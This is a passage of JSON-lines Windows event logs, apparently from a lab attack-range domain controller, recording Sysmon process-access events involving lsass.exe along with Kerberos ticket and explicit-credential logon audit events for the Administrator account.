06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5782,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.291\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010EA5D0800}\r\nTargetProcessId: 4164\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.291","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010EA5D0800}","TargetProcessId":"4164","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5783,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.307\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.307","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5784,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.307\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.307","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5785,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.307\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.307","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5786,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.322\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.322","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5787,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.322\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.322","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220597,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220598,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{DF6BBC2C-9F09-9001-5E0E-202CAB6F088A}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{DF6BBC2C-9F09-9001-5E0E-202CAB6F088A}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220599,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{DF6BBC2C-9F09-9001-5E0E-202CAB6F088A}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x474\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{DF6BBC2C-9F09-9001-5E0E-202CAB6F088A}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
